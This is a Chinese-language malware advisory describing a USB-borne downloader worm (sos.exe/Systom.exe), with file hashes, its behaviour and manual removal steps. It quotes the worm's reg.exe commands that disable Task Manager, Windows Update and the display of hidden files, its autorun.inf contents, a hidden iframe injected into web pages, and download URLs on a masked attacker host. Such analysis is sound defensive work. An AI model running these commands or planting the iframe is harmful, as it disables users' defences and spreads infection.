U盘病毒sos.exe,systom.exe的查杀

这是一个可以通过U盘传播的感染下载者，对系统有一定的破坏作用，是之前流行的crsss.exe病毒系列的一个新变种。

File: sos.exe
Size: 26624 bytes
Modified: 2007年11月11日, 13:32:04
MD5: 6955C9DE365BEDA81390DE069D5A67F5
SHA1: 4087A6F44E81F907F0DE0FB31C15E359A90680B5
CRC32: 870BA6FE
加壳方式：upx
AV命名：Worm.Win32.Agent.yzg（瑞星）

技术细节：
1.病毒运行后，衍生如下副本：
%systemroot%\system32\auToRun.inf
%systemroot%\system32\Systom.exe
在每个分区根目录下面生成auToRun.inf和Systom.exe，达到通过U盘等移动存储传播的目的。

2.调用reg.exe执行相应注册表操作：
(1)ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V crsss /T REG_SZ /D
添加自身启动项目

(2)add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\WindowsUpdate /v DisableWindowsUpdateAccess /t REG_dword /d 00000001 /f
禁用windows自动更新

(3)add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_dword /d 00000001 /f
禁用任务管理器

(4)add "HKCU\Software\Microsoft\Windows\CurrentVersion\EXPlorer\Advanced" /v Hidden /t reg_dWord /d 00000000 /f
add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v ShowSuperHidden /t reg_dword /d 00000000 /f
add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL" /v CheckedValue /t REG_SZ /d 0 /f
破坏显示隐藏文件的功能

(5)add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v HideFileExt /t reg_dword /d 00000001 /f
不显示文件的扩展名

(6)add "HKCU\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /t REG_EXPAND_SZ /d
锁定主页

(7)add "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel" /v "HomePage" /t REG_DWORD /d 00000001 /f
使得IE的主页设定选项不可选

3.检测带有如下字样的窗口并将其关闭
病毒
木马
检测
wpe

4.遍历所有磁盘分区删除*.gho文件，使得用户中毒后无法使用ghost恢复系统

5.遍历所有磁盘分区的INDEX.ASP，.HTM，INDEX.PHP，DEFAULT.ASP，DEFAULT.PHP，CONN.ASP文件
并在其尾部加入<IfrAmE src=http://www.*.cn/mywm/index.htm width=0 height=0></IfrAmE>的代码

6.调用IE连接网络通过http://www.*.cn/cj/tj/tj.asp进行感染统计

7.自身连接网络下载http://www.*.cn/cj/xiao.txt
http://www.*.cn/cj/table.txt
和http://www.*.cn/cj/IEURL.txt
到%systemroot%\system32下面命名为h1.dll~h5.dll

三个文件均为网页文件

中毒后的sreng日志如下：
启动项目
注册表
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
<crsss><C:\WINDOWS\system32\Systom.exe> []

==================================
Autorun.inf
[C:\]
[AuToRun]
open=sos.exe
shell\open=打开(&O)
shell\open\Command=sos.exe
shell\open\Default=1
shell\explore=资源管理器(&X)
shell\explore\Command=sos.exe
[D:\]
[AuToRun]
open=sos.exe
shell\open=打开(&O)
shell\open\Command=sos.exe
shell\open\Default=1
shell\explore=资源管理器(&X)
shell\explore\Command=sos.exe
...
解决办法：
下载sreng(下载地址：down.45it.com)

启动计算机进入
安全模式下(开机后不断按F8键然后出来一个高级菜单选择第一项安全模式进入系统)

1.打开sreng
启动项目注册表删除如下项目
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
<crsss><C:\WINDOWS\system32\Systom.exe> []

系统修复－Windows Shell / IE
勾选如下选项

允许在Windows 2000/XP/Server 2003中使用任务管理器
设置主页为"about:blank"
允许Internet Explorer选项窗口和选项窗口的所有内容
显示隐藏文件

然后点击“修复”按钮

2.重启计算机

双击我的电脑，工具，文件夹选项，查看，单击选取"显示隐藏文件或文件夹" 并清除"隐藏受保护的操作系统文件（推荐）"前面的钩。在提示确定更改时，单击“是” 然后确定
点击菜单栏下方的文件夹按钮（搜索右边的按钮）
在左边的资源管理器中单击打开系统所在盘
删除如下文件
%systemroot%\system32\auToRun.inf
%systemroot%\system32\Systom.exe
%systemroot%\system32\h1.dll~h5.dll

在左边的资源管理器中单击打开每个分区
删除每个分区根目录下面的sos.exe和auToRun.inf

3.修复被感染的网页文件
推荐使用CSI的iframkill(可到down.45it.com下载)